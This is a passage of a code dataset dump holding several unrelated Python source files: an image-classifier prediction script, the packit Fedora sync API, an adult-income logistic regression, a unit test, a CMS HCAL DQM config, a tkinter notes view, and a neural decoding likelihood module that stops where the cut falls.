+{"seq_id":"604872640","text":"import os\nfrom scripts.label_image import *\nimport pandas as pd\n\nPROJECT_PATH = \"D:\\\\00_work\\\\data\\\\kaggle datasets\\\\DR\\\\\"\n\ndef cal_accuracy(file_list, top_dict, class_no=2):\n    df = pd.read_csv(PROJECT_PATH+'trainLabels.csv')\n    correct = 0\n    num = len(file_list)\n    for f in file_list:\n        idx = f[0:len(f)-5]\n        if class_no == 2:\n            correct_label = int(df[df.image == idx].level.values>0)\n        \n        if correct_label == top_dict[idx]:\n            correct+=1\n    \n    print('CORRECT {0}'.format(correct))\n    return correct/num\n    \nif __name__ == \"__main__\":\n    test_path = PROJECT_PATH + 'test\\\\'\n    file_list = os.listdir(test_path)\n    file_name = test_path + file_list[0]\n    model_file = \"tf_files/retrained_graph.pb\"\n    label_file = \"tf_files/retrained_labels.txt\"\n    input_height = 224\n    input_width = 224\n    #input_mean = 128\n    #input_std = 128\n    input_mean = 127.5\n    input_std = 127.5\n    input_layer = \"input\"\n    output_layer = \"final_result\"\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--image\", help=\"image to be processed\")\n    parser.add_argument(\"--graph\", help=\"graph/model to be executed\")\n    parser.add_argument(\"--labels\", help=\"name of file containing labels\")\n    parser.add_argument(\"--input_height\", type=int, help=\"input height\")\n    parser.add_argument(\"--input_width\", type=int, help=\"input width\")\n    parser.add_argument(\"--input_mean\", type=int, help=\"input mean\")\n    parser.add_argument(\"--input_std\", type=int, help=\"input std\")\n    parser.add_argument(\"--input_layer\", help=\"name of input layer\")\n    parser.add_argument(\"--output_layer\", help=\"name of output layer\")\n    args = parser.parse_args()\n\n    if args.graph:\n        model_file = args.graph\n    if args.image:\n        file_name = args.image\n    if args.labels:\n        label_file = args.labels\n    if args.input_height:\n        input_height = args.input_height\n    if args.input_width:\n        input_width = args.input_width\n    if args.input_mean:\n        input_mean = args.input_mean\n    if args.input_std:\n        input_std = args.input_std\n    if args.input_layer:\n        input_layer = args.input_layer\n    if args.output_layer:\n        output_layer = args.output_layer\n    \n    key_list = []\n    value_list = []\n    graph = load_graph(model_file)\n    labels = load_labels(label_file)\n    input_name = \"import/\" + input_layer\n    output_name = \"import/\" + output_layer\n    input_operation = graph.get_operation_by_name(input_name);\n    output_operation = graph.get_operation_by_name(output_name);\n    count = 0\n    num = len(file_list)\n\n    for f in file_list:\n        src = test_path + f\n        t = read_tensor_from_image_file(src,\n                input_height=input_height,\n                input_width=input_width,\n                input_mean=input_mean,\n                input_std=input_std)\n\n\n        with tf.Session(graph=graph) as sess:\n            results = sess.run(output_operation.outputs[0],\n                              {input_operation.outputs[0]: t})\n        \n        results = np.squeeze(results)\n        
top_k = results.argsort()[-5:][::-1]\n key_list.append(f[0:(len(f)-5)]) \n value_list.append(int(labels[list(results).index(max(results))]))\n \n count+=1\n if count%20 == 0:\n print(\"Done {0}/{1}\".format(count, num))\n \n top_dict = dict(zip(key_list, value_list))\n print(cal_accuracy(file_list, top_dict))\n \n \n ","sub_path":"tf_files/mobilenet/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"504870585","text":"\"\"\"\nThis is the official python interface for packit.\n\"\"\"\n\nimport logging\n\nfrom packit.config import Config, PackageConfig\nfrom packit.distgit import DistGit\nfrom packit.upstream import Upstream\n\nlogger = logging.getLogger(__name__)\n\n\nclass PackitAPI:\n def __init__(self, config: Config, package_config: PackageConfig) -> None:\n self.config = config\n self.package_config = package_config\n\n def sync_pr(self, pr_id, dist_git_branch: str, upstream_version: str = None):\n up = Upstream(config=self.config, package_config=self.package_config)\n\n dg = DistGit(config=self.config, package_config=self.package_config)\n\n up.checkout_pr(pr_id=pr_id)\n local_pr_branch = f\"pull-request-{pr_id}-sync\"\n # fetch and reset --hard upstream/$branch?\n dg.checkout_branch(dist_git_branch)\n dg.create_branch(local_pr_branch)\n dg.checkout_branch(local_pr_branch)\n\n dg.sync_files(up.local_project)\n\n patches = up.create_patches(\n upstream=upstream_version, destination=dg.local_project.working_dir\n )\n dg.add_patches_to_specfile(patches)\n\n description = (\n f\"Upstream pr: {pr_id}\\n\"\n f\"Upstream commit: {up.local_project.git_repo.head.commit}\\n\"\n )\n\n self.sync(\n distgit=dg,\n commit_msg=f\"Sync upstream pr: {pr_id}\",\n pr_title=f\"Upstream pr: {pr_id}\",\n pr_description=description,\n dist_git_branch=\"master\",\n add_new_sources=False,\n )\n\n def sync_release(self, dist_git_branch: str, version: str = None):\n \"\"\"\n Update given package in Fedora\n \"\"\"\n up = Upstream(config=self.config, package_config=self.package_config)\n\n dg = DistGit(config=self.config, package_config=self.package_config)\n\n full_version = version or up.get_upstream_version()\n current_up_branch = up.active_branch\n try:\n # TODO: this is problematic, since we may overwrite stuff in the repo\n # but the thing is that we need to do it\n # I feel like the ideal thing to do would be to clone the repo and work in tmpdir\n # TODO: this is also naive, upstream may use different tagging scheme, e.g.\n # release = 232, tag = v232\n up.checkout_release(full_version)\n\n local_pr_branch = f\"{full_version}-{dist_git_branch}-update\"\n # fetch and reset --hard upstream/$branch?\n logger.info(f'using \"{dist_git_branch}\" dist-git branch')\n dg.checkout_branch(dist_git_branch)\n dg.create_branch(local_pr_branch)\n dg.checkout_branch(local_pr_branch)\n\n description = (\n f\"Upstream tag: {full_version}\\n\"\n f\"Upstream commit: {up.local_project.git_repo.head.commit}\\n\"\n )\n\n dg.sync_files(up.local_project)\n\n self.sync(\n distgit=dg,\n commit_msg=f\"{full_version} upstream release\",\n pr_title=f\"Update to upstream release {full_version}\",\n pr_description=description,\n dist_git_branch=dist_git_branch,\n commit_msg_description=description,\n add_new_sources=True,\n )\n finally:\n current_up_branch.checkout()\n\n def sync(\n self,\n distgit: DistGit,\n commit_msg: str,\n pr_title: str,\n pr_description: str,\n dist_git_branch: str,\n 
commit_msg_description: str = None,\n add_new_sources=False,\n ):\n\n if add_new_sources:\n archive = distgit.download_upstream_archive()\n distgit.upload_to_lookaside_cache(archive)\n\n distgit.commit(title=commit_msg, msg=commit_msg_description)\n # the branch may already be up, let's push forcefully\n distgit.push_to_fork(distgit.local_project.ref, force=True)\n distgit.create_pull(\n pr_title,\n pr_description,\n source_branch=distgit.local_project.ref,\n target_branch=dist_git_branch,\n )\n","sub_path":"packit/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"265146649","text":"#####################Import the packages \nimport numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt \n\nfrom sklearn import preprocessing\nfrom sklearn.linear_model import LogisticRegression\n\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix, classification_report\n\n\n####################IMPORT THE DATABASE\n\ncolumns = ['age', 'workclass', 'fnlwgt', 'education', 'educational-num','marital-status', 'occupation', 'relationship', 'race', 'gender','capital-gain', 'capital-loss', 'hours-per-week', 'native-country','income']\n\n\ntrain = pd.read_csv('adult_data.txt', sep=\",\\s\", header=None, names = columns, engine = 'python')\ntest = pd.read_csv('adult_test.txt', sep=\",\\s\", header=None, names = columns, engine = 'python')\ntest['income'].replace(regex=True,inplace=True,to_replace=r'\\.',value=r'')\n\n\nadult = pd.concat([test,train])\nadult.reset_index(inplace = True, drop = True)\n\n# Setting all the categorical columns to type category\nfor col in set(adult.columns) - set(adult.describe().columns):\n adult[col] = adult[col].astype('category')\n\n\nfor i,j in zip(adult.columns,(adult.values.astype(str) == '?').sum(axis = 0)):\n if j > 0:\n print(str(i) + ': ' + str(j) + ' records')\n\n\n# Create one hot encoding of the categorical columns in the data frame.\ndef oneHotCatVars(df, df_cols):\n df_1 = adult_data = df.drop(columns=df_cols, axis=1)\n df_2 = pd.get_dummies(df[df_cols])\n\n return (pd.concat([df_1, df_2], axis=1, join='inner'))\n\n\n\n\n\nmajority_class = adult.workclass.value_counts().index[0]\n\n\nadult.loc[(adult.workclass.values == '?'),'workclass'] = majority_class\n\n\n\ntest_data = adult[(adult.occupation.values == '?')].copy()\ntest_label = test_data.occupation\n\nmajority_class = adult.occupation.value_counts().index[0]\n\n\nadult.loc[(adult.occupation.values == '?'),'occupation'] = majority_class\nprint(adult.occupation.unique())\n\nmajority_class = adult['native-country'].value_counts().index[0]\nadult.loc[(adult['native-country'].values == '?'),'native-country'] = majority_class\n\"\"\"\nadult['workclass'] = adult['workclass'].cat.remove_categories('?')\nadult['occupation'] = adult['occupation'].cat.remove_categories('?')\nadult['native-country'] = adult['native-country'].cat.remove_categories('?')\n\n\"\"\"\n########### Preparing data for Training and testing\n\n# Data Prep\nadult_data = adult.drop(columns = ['income'])\nadult_label = adult.income\n\n\nadult_cat_1hot = pd.get_dummies(adult_data.select_dtypes('category'))\nadult_non_cat = adult_data.select_dtypes(exclude = 'category')\n\nadult_data_1hot = pd.concat([adult_non_cat, adult_cat_1hot], axis=1, join='inner')\ntrain_data, test_data, train_label, test_label = train_test_split(adult_data_1hot, adult_label, test_size = 0.25)\n\n# 
Normalization\nfrom sklearn.preprocessing import StandardScaler\nscaler = StandardScaler()\n\n# Fitting only on training data\nscaler.fit(train_data)\ntrain_data = scaler.transform(train_data)\n\n# Applying same transformation to test data\ntest_data = scaler.transform(test_data)\n\nimport pickle\n\n\nlog_reg = LogisticRegression(penalty = 'l2', dual = False, tol = 1e-4, fit_intercept = True,\n solver = 'liblinear')\ndataset = {}\ndataset['train_data'] = train_data\ndataset['test_data'] = test_data\ndataset['train_label'] = train_label\ndataset['test_label'] = test_label\nlog_reg.fit(train_data, train_label)\nlog_reg_pred = log_reg.predict(test_data)\n\nfile_Name = \"adult.data\"\n# open the file for writing\nfileObject = open(file_Name, 'wb')\n\n# this writes the object a to the\n# file named 'testfile'\npickle.dump(dataset, fileObject)\nprint(log_reg.score(test_data,test_label))\n","sub_path":"adult/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"370947651","text":"import unittest\r\nfrom city_function import city_country\r\n\r\nclass CityTestCases(unittest.TestCase):\r\n\tdef test_city_country(self):\r\n\t\tformatted_city = city_country('kyiv', 'ukraine')\r\n\t\tself.assertEqual(formatted_city,'Kyiv, Ukraine')\r\n\r\n\tdef test_with_population(self):\r\n\t\tformatted_city = city_country('kyiv','ukraine', 42000000)\r\n\t\tself.assertEqual(formatted_city, 'Kyiv, Ukraine - population 42000000 people')\r\n\r\nunittest.main()","sub_path":"test_city_function.py","file_name":"test_city_function.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"544847881","text":"import FWCore.ParameterSet.Config as cms\nfrom DQM.HcalMonitorModule.HcalMonitorModule_cfi import * # Can this be done better?\nfrom DQM.HcalMonitorClient.HcalMonitorClient_cfi import * \n\nmaxevents=-1\ncheckNevents=1000\n\nprocess = cms.Process(\"HCALDQM\")\n#----------------------------\n# Event Source\n#-----------------------------\nprocess.load(\"DQM.Integration.test.inputsource_playback_cfi\")\nprocess.EventStreamHttpReader.consumerName = 'Hcal DQM Consumer'\n\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(maxevents)\n )\n\n#process.source = cms.Source(\"EventStreamHttpReader\",\n# #sourceURL = cms.string('http://srv-C2D05-05:50082/urn:xdaq-application:lid=29'),\n# sourceURL = cms.string('http://cmsmondev:50082/urn:xdaq-application:lid=29'),\n# consumerPriority = cms.untracked.string('normal'),\n# max_event_size = cms.int32(7000000),\n# consumerName = cms.untracked.string('Playback Source'),\n# max_queue_depth = cms.int32(5),\n# maxEventRequestRate = cms.untracked.double(10.0),\n# SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('*')\n# ),\n# headerRetryInterval = cms.untracked.int32(3)\n# )\n\nprocess.source = cms.Source(\"PoolSource\",\n\n fileNames = cms.untracked.vstring\n (\n #'/store/data/Commissioning08/Cosmics/RAW/v1/000/069/987/32803ED3-54AD-DD11-BA3D-000423D94E1C.root',\n '/store/data/Commissioning09/Cosmics/RAW/v1/000/079/159/FEEA7F80-581A-DE11-A9B2-000423D98DD4.root'\n )\n\n )\n\n\n#----------------------------\n# DQM Environment\n#-----------------------------\nprocess.load(\"DQMServices.Core.DQM_cfg\")\nprocess.load(\"DQMServices.Components.DQMEnvironment_cfi\")\n#process.DQMStore.referenceFileName = 
'/home/dqmdevlocal/reference/hcal_reference.root'\n\n#----------------------------\n# DQM Playback Environment\n#-----------------------------\nprocess.load(\"DQM.Integration.test.environment_playback_cfi\")\nprocess.dqmEnv.subSystemFolder = \"Hcal\"\n\nprocess.DQM.collectorHost = 'lxplus228.cern.ch' # change to whichever computer you are using\nprocess.DQM.collectorPort = 9190\nprocess.dqmSaver.dirName = '/tmp/temple/dqmdata'\nprocess.dqmSaver.producer = \"DQM\"\n\n#-----------------------------\n# Hcal Conditions: from Global Conditions Tag \n#-----------------------------\n\nprocess.load(\"Configuration.StandardSequences.FrontierConditions_GlobalTag_cff\")\nprocess.GlobalTag.globaltag = \"CRAFT_30X::All\"\nprocess.es_prefer_GlobalTag = cms.ESPrefer('PoolDBESSource','GlobalTag')\n\n#process.GlobalTag.connect = \"frontier://(proxyurl=http://localhost:3128)(serverurl=http://frontier1.cms:8000/FrontierOnProd)(serverurl=http://frontier2.cms:8000/FrontierOnProd)(retrieve-ziplevel=0)/CMS_COND_21X_GLOBALTAG\"\n\n\nprocess.prefer(\"GlobalTag\")\n\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\n\n\n#-----------------------------\n# Hcal DQM Source, including SimpleReconstrctor\n#-----------------------------\nprocess.load(\"DQM.HcalMonitorModule.HcalMonitorModule_cfi\")\nprocess.load(\"EventFilter.HcalRawToDigi.HcalRawToDigi_cfi\")\nprocess.load(\"RecoLocalCalo.HcalRecProducers.HcalSimpleReconstructor_hbhe_cfi\")\nprocess.load(\"RecoLocalCalo.HcalRecProducers.HcalSimpleReconstructor_ho_cfi\")\nprocess.load(\"RecoLocalCalo.HcalRecProducers.HcalSimpleReconstructor_hf_cfi\")\nprocess.load(\"RecoLocalCalo.HcalRecProducers.HcalSimpleReconstructor_zdc_cfi\")\n\n# This line is necessary for releases > 3_9_0_pre4\n# Earlier CMSSW versions should comment out this line \nprocess.hbhereco = process.hbheprereco.clone()\n\n# hcalMonitor configurable values -----------------------\nprocess.hcalMonitor.debug = 0\n#process.hcalMonitor.DigiOccThresh = -999999999 ##Temporary measure while DigiOcc is reworked.\nprocess.hcalMonitor.pedestalsInFC = True\nprocess.hcalMonitor.showTiming = False\nprocess.hcalMonitor.checkNevents=checkNevents\nprocess.hcalMonitor.dump2database = False\n\n# Turn on/off individual hcalMonitor modules ------------\nprocess.hcalMonitor.DataFormatMonitor = True\nprocess.hcalMonitor.DataIntegrityTask = True\nprocess.hcalMonitor.DigiMonitor = True\nprocess.hcalMonitor.RecHitMonitor = True\nprocess.hcalMonitor.TrigPrimMonitor = False\nprocess.hcalMonitor.DeadCellMonitor = True\nprocess.hcalMonitor.HotCellMonitor = True\nprocess.hcalMonitor.BeamMonitor = True\nprocess.hcalMonitor.PedestalMonitor = True\nprocess.hcalMonitor.LEDMonitor = False\nprocess.hcalMonitor.CaloTowerMonitor = False\nprocess.hcalMonitor.MTCCMonitor = False\nprocess.hcalMonitor.HcalAnalysis = False\n\n# This takes the default cfg values from the hcalMonitor base class and applies them to the subtasks.\nsetHcalTaskValues(process.hcalMonitor)\n\n# Set individual Task values here (otherwise they will remain set to the values specified for the hcalMonitor.)\nprocess.hcalMonitor.DeadCellMonitor_pedestal_Nsigma = 0\nprocess.hcalMonitor.DeadCellMonitor_makeDiagnosticPlots = False\nprocess.hcalMonitor.DeadCellMonitor_test_pedestal = True\nprocess.hcalMonitor.DeadCellMonitor_test_occupancy = True\nprocess.hcalMonitor.DeadCellMonitor_test_neighbor = False\n\nprocess.hcalMonitor.HotCellMonitor_makeDiagnosticPlots = False\nprocess.hcalMonitor.HotCellMonitor_test_neighbor = False\n\n#-----------------------------\n# Hcal DQM 
Client\n#-----------------------------\nprocess.load(\"DQM.HcalMonitorClient.HcalMonitorClient_cfi\")\n\n# hcalClient configurable values ------------------------\n# suppresses html output from HCalClient \nprocess.hcalClient.baseHtmlDir = '' # set to '' to prevent html output\n\n# Set client settings to the same as monitor. At the moment, this doesn't affect client minErrorFlag\n# Summary Client is also unaffected\nsetHcalClientValuesFromMonitor(process.hcalClient,process.hcalMonitor, debug=False) # turn debug to True to dump out client settings\n\nprocess.hcalClient.SummaryClient = True\n\n#-----------------------------\n# Scheduling\n#-----------------------------\nprocess.options = cms.untracked.PSet(\n Rethrow = cms.untracked.vstring('ProductNotFound', \n 'TooManyProducts', \n 'TooFewProducts')\n)\n\nprocess.p = cms.Path(process.hcalDigis*process.horeco*process.hfreco*process.hbhereco*process.zdcreco*process.hcalMonitor*process.hcalClient*process.dqmEnv*process.dqmSaver)\n\n\n#-----------------------------\n# Quality Tester \n# will add switch to select histograms to be saved soon\n#-----------------------------\nprocess.qTester = cms.EDFilter(\"QualityTester\",\n prescaleFactor = cms.untracked.int32(1),\n qtList = cms.untracked.FileInPath('DQM/HcalMonitorClient/data/hcal_qualitytest_config.xml'),\n getQualityTestsFromFile = cms.untracked.bool(True)\n)\n\n","sub_path":"DQM/HcalMonitorModule/python/hcal_dqm_sourceclient-playback_cfg.py","file_name":"hcal_dqm_sourceclient-playback_cfg.py","file_ext":"py","file_size_in_byte":6979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"162134256","text":"import datetime\r\n\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\n\r\nfrom logic.day_overview import DayOverviewController\r\n\r\n\r\nclass DayOverview(tk.Frame):\r\n def __init__(self, parent):\r\n super().__init__(parent)\r\n self.grid_columnconfigure(0, weight=1, minsize=1000)\r\n self.grid_columnconfigure(1, weight=0, minsize=150)\r\n self.grid_rowconfigure(0, weight=0, minsize=70)\r\n self.grid_rowconfigure(1, weight=1, minsize=350)\r\n\r\n self.controller = DayOverviewController()\r\n\r\n top_box = tk.Frame(self, background='red')\r\n top_box.grid(row=0, column=0, sticky='nsew')\r\n\r\n navigation = tk.Frame(top_box, background='blue')\r\n navigation.pack(fill='both', expand=True)\r\n # navigation.place(relx=0.5, rely=0.5, anchor='center')\r\n\r\n left_btn = tk.Button(navigation, text='<-')\r\n left_btn.pack(side='left', expand=True, fill='both')\r\n left_btn.config(command=self.controller.prev_day, font=(\"Courier\", 15))\r\n\r\n date_var = tk.StringVar()\r\n date_var.set('TESTSS')\r\n date_var.trace_add('write', lambda *args: self.controller.date.set_string(date_var.get()))\r\n self.controller.date.on_change(lambda data: date_var.set(data))\r\n\r\n date_lbl = tk.Label(navigation, textvariable=date_var, width=20)\r\n date_lbl.pack(side='left', expand=True, fill='both')\r\n date_lbl.config(font=('Courier', 15))\r\n\r\n right_btn = tk.Button(navigation, text='->')\r\n right_btn.pack(side='left', expand=True, fill='both')\r\n right_btn.config(command=self.controller.next_day, font=(\"Courier\", 15))\r\n\r\n tree = BetterTreeview(self)\r\n headers = tuple((name, int(ratio * 800)) for name, ratio in self.controller.header)\r\n tree.set_headers(headers)\r\n tree.grid(row=1, column=0, sticky='nsew')\r\n tree.bind('', lambda event: self.create_edit_note())\r\n tree.on_add_item_func = 
self.controller.note_list.add_item_without_event\r\n self.controller.note_list.on_add_item_func = tree.add_item_without_event\r\n self.controller.note_list.on_set_by_func = tree.set_by_index\r\n self.controller.note_list.on_move_item_func = tree.move_item\r\n\r\n # Frame of buttons\r\n menu = tk.Frame(self, width=100)\r\n menu.grid(row=1, column=1, sticky='nsew')\r\n\r\n button_kwargs = dict(ipady=31, ipadx=50)\r\n\r\n add_btn = tk.Button(menu, text='Add')\r\n add_btn.config(command=self.create_add_note)\r\n add_btn.pack(side='top', fill='both', **button_kwargs)\r\n\r\n edit_btn = tk.Button(menu, text='Edit')\r\n edit_btn.config(command=self.create_edit_note)\r\n edit_btn.pack(side='top', fill='both', **button_kwargs)\r\n\r\n delete_btn = tk.Button(menu, text='Delete')\r\n delete_btn.config(command=self.delete_note)\r\n delete_btn.pack(side='top', fill='both', **button_kwargs)\r\n\r\n refresh_btn = tk.Button(menu, text='Refresh')\r\n refresh_btn.config(command=self.controller.refresh)\r\n refresh_btn.pack(side='top', fill='both', **button_kwargs)\r\n\r\n self.treeview = tree\r\n self.add_btn = add_btn\r\n self.edit_btn = edit_btn\r\n\r\n self.controller.clear_list_func = self.clear_list\r\n # self.controller.init_values(async_mode=True)\r\n\r\n def clear_list(self):\r\n for i in self.treeview.get_children():\r\n self.treeview.delete(i)\r\n\r\n def create_note_popup(self, id=None, on_store_data=lambda note: None, time=None):\r\n new_window = tk.Toplevel(self)\r\n from .note_form import AddNotesView\r\n add_note = AddNotesView(new_window, id=id, time=time)\r\n add_note.pack(side='top', fill='both', expand=True)\r\n add_note.on_store_data = on_store_data\r\n\r\n def create_add_note(self):\r\n if self.controller.date.get(as_string=False) == datetime.date.today():\r\n time_to_use = datetime.datetime.now()\r\n else:\r\n time_to_use = datetime.datetime.combine(self.controller.date.get(as_string=False), datetime.datetime.min.time())\r\n self.create_note_popup(on_store_data=self.controller.add_note, time=time_to_use)\r\n\r\n def create_edit_note(self):\r\n item = self.treeview.focus()\r\n if item is None:\r\n return\r\n index = self.treeview.index(item)\r\n id = self.controller.get_selected_note_id(index)\r\n self.create_note_popup(id=id, on_store_data=self.controller.edit_note)\r\n\r\n def delete_note(self):\r\n item = self.treeview.focus()\r\n if item is None:\r\n return\r\n index = self.treeview.index(item)\r\n if self.controller.delete(index):\r\n self.treeview.delete(item)\r\n # print([self.treeview.item(i, 'values')[4] for i in self.treeview.get_children()], '\\n', [n[4] for n in self.controller.note_list.get()])\r\n\r\n\r\nclass Navigation():\r\n pass\r\n\r\n\r\nclass BetterTreeview(ttk.Treeview):\r\n def __init__(self, master=None, **kw):\r\n super().__init__(master, **kw)\r\n self['show'] = 'headings'\r\n self['selectmode'] = 'browse'\r\n self.on_add_item_func = lambda values, index: None\r\n\r\n def set_headers(self, headers_tuple):\r\n header_names = tuple(h[0] for h in headers_tuple)\r\n self['columns'] = header_names\r\n for header, width in headers_tuple:\r\n self.heading(header, text=header, anchor='w')\r\n self.column(header, width=width)\r\n\r\n def set_by_index(self, index, value):\r\n for i, item in enumerate(self.get_children()):\r\n if i == index:\r\n self.item(item, values=value)\r\n return\r\n\r\n def move_item(self, old_index, new_index):\r\n old_item = self.get_children()[old_index]\r\n self.move(old_item, '', new_index)\r\n\r\n def add_item_without_event(self, values, 
index=None):\r\n # attach to root, append to end, values is tuple of values to add\r\n # hmmm\r\n # if index is not None and index < len(self.get_children()):\r\n # self.delete(self.get_children()[index])\r\n self.insert('', 'end' if index is None else index, value=values)\r\n\r\n def add_item(self, values, index=None): # TODO: add event for appending here\r\n self.add_item_without_event(values, 'end' if index is None else index)\r\n self.on_add_item_func(values, index)\r\n","sub_path":"k0haku_notes/views_tk/day_overview_list.py","file_name":"day_overview_list.py","file_ext":"py","file_size_in_byte":6348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"632348998","text":"'''\n'''\n\nfrom functools import partial\n\nimport numpy as np\nfrom tqdm.autonotebook import tqdm\n\nfrom .core import atleast_2d\n\n\ndef multiunit_likelihood(multiunit, position, place_bin_centers,\n occupancy_model, joint_models, marginal_models,\n mean_rates, time_bin_size=1):\n '''The likelihood of being in a replay state vs. not a replay state based\n on whether the multiunits correspond to the current position of the animal.\n\n Parameters\n ----------\n multiunit : ndarray, shape (n_time, n_marks, n_electrodes)\n position : ndarray, shape (n_time,)\n place_bin_centers : ndarray, shape (n_place_bins,)\n occupancy_model : list of fitted density models, len (n_electrodes)\n joint_models : list of fitted density models, len (n_electrodes)\n marginal_models : list of fitted density models, len (n_electrodes)\n mean_rates : list of floats, len (n_electrodes)\n time_bin_size : float, optional\n\n Returns\n -------\n multiunit_likelihood : ndarray, shape (n_time, 2, n_place_bins)\n\n '''\n n_time = multiunit.shape[0]\n n_place_bins = place_bin_centers.size\n multiunit_likelihood = np.zeros((n_time, 2, n_place_bins))\n multiunit_likelihood[:, 1, :] = np.exp(estimate_replay_log_likelihood(\n np.moveaxis(multiunit, -1, 0), place_bin_centers,\n occupancy_model, joint_models, marginal_models, mean_rates,\n time_bin_size))\n multiunit_likelihood[:, 0, :] = np.exp(estimate_no_replay_log_likelihood(\n np.moveaxis(multiunit, -1, 0), position, occupancy_model,\n joint_models, marginal_models, mean_rates, time_bin_size))\n\n return multiunit_likelihood\n\n\ndef estimate_replay_log_likelihood(\n multiunits, place_bin_centers, occupancy_model,\n joint_models, marginal_models, mean_rates, time_bin_size):\n '''Estimate the log likelihood of being at any position.\n\n Parameters\n ----------\n multiunits : ndarray, shape (n_electrodes, n_time, n_features)\n place_bin_centers : ndarray, shape (n_place_bins,)\n occupancy_model : fitted density model\n marginal_models : list of fitted density models, len (n_electrodes,)\n mean_rates : list of floats, shape (n_electrodes,)\n time_bin_size : float\n\n Returns\n -------\n replay_log_likelihood : ndarray, shape (n_time, n_place_bins)\n\n '''\n\n n_bin = place_bin_centers.size\n n_time = multiunits.shape[1]\n log_likelihood = np.zeros((n_time, n_bin))\n\n occupancy = estimate_occupancy(place_bin_centers, occupancy_model)\n\n for multiunit, joint_model, marginal_model, mean_rate in zip(\n tqdm(multiunits, desc='electrodes'), joint_models, marginal_models,\n mean_rates):\n ground_process_intensity = np.atleast_2d(\n estimate_ground_process_intensity(\n place_bin_centers, occupancy, marginal_model, mean_rate))\n log_joint_mark_intensity = np.stack([\n estimate_log_joint_mark_intensity(\n multiunit, place_bin * np.ones((n_time, 1)), 
joint_model,\n mean_rate, occ * np.ones((n_time,)))\n for occ, place_bin in zip(occupancy, place_bin_centers)], axis=1)\n log_likelihood += poisson_mark_log_likelihood(\n log_joint_mark_intensity, ground_process_intensity, time_bin_size)\n\n return log_likelihood\n\n\ndef estimate_no_replay_log_likelihood(\n multiunits, position, occupancy_model,\n joint_models, marginal_models, mean_rates, time_bin_size):\n '''Estimate the log likelihood of being at the current position.\n\n Parameters\n ----------\n multiunits : ndarray, shape (n_electrodes, n_time, n_features)\n position : ndarray, shape (n_time, n_position_dims)\n occupancy_model : fitted density model\n joint_models : list of fitted density models, len (n_electrodes,)\n marginal_models : list of fitted density models, len (n_electrodes,)\n mean_rates : list of floats, len (n_electrodes,)\n time_bin_size : float\n\n Returns\n -------\n no_replay_log_likelihood : ndarray, shape (n_time,)\n\n '''\n n_time = multiunits.shape[1]\n log_likelihood = np.zeros((n_time, 1))\n\n occupancy = estimate_occupancy(position, occupancy_model)\n\n for multiunit, joint_model, marginal_model, mean_rate in zip(\n tqdm(multiunits, desc='electrodes'), joint_models, marginal_models,\n mean_rates):\n ground_process_intensity = estimate_ground_process_intensity(\n position, occupancy, marginal_model, mean_rate)[:, np.newaxis]\n log_joint_mark_intensity = estimate_log_joint_mark_intensity(\n multiunit, position, joint_model, mean_rate, occupancy\n )[:, np.newaxis]\n log_likelihood += poisson_mark_log_likelihood(\n log_joint_mark_intensity, ground_process_intensity,\n time_bin_size)\n\n return log_likelihood\n\n\ndef poisson_mark_log_likelihood(log_joint_mark_intensity,\n ground_process_intensity, time_bin_size=1):\n '''Probability of parameters given spiking indicator at a particular\n time and associated marks.\n\n Parameters\n ----------\n log_joint_mark_intensity : ndarray, shape (n_time, n_position)\n ground_process_intensity : ndarray, shape (n_time, n_position)\n Probability of observing a spike regardless of multiunit.\n time_bin_size : float, optional\n\n Returns\n -------\n poisson_mark_log_likelihood : ndarray, shape (n_time, n_position)\n\n '''\n return np.log(time_bin_size) + log_joint_mark_intensity - (\n ground_process_intensity * time_bin_size)\n\n\ndef estimate_occupancy(position, occupancy_model):\n '''Computes the spatial occupancy.\n\n Parameters\n ----------\n position : ndarray, shape (n_time, n_position_dims)\n occupancy_model : fitted density model\n\n Returns\n -------\n occupancy : ndarray, shape (n_time,)\n\n '''\n position = atleast_2d(position)\n not_nan_position = np.all(~np.isnan(position), axis=1)\n occupancy = np.full((position.shape[0],), np.nan)\n occupancy[not_nan_position] = np.exp(\n occupancy_model.score_samples(position[not_nan_position]))\n return occupancy\n\n\ndef estimate_ground_process_intensity(position, occupancy,\n marginal_model, mean_rate):\n '''Computes the rate function of position marginalized over mark.\n\n Parameters\n ----------\n position : ndarray, shape (n_time, n_position_dims)\n occupancy : ndarray, shape (n_position_dims,)\n marginal_model : fitted density model\n mean_rate : float\n\n Returns\n -------\n ground_process_intensity : ndarray, shape (n_time,)\n\n '''\n place_field = marginal_model.score_samples(atleast_2d(position))\n return np.exp(np.log(mean_rate) + place_field - np.log(occupancy))\n\n\ndef estimate_log_joint_mark_intensity(\n multiunit, position, joint_model, mean_rate, occupancy):\n 
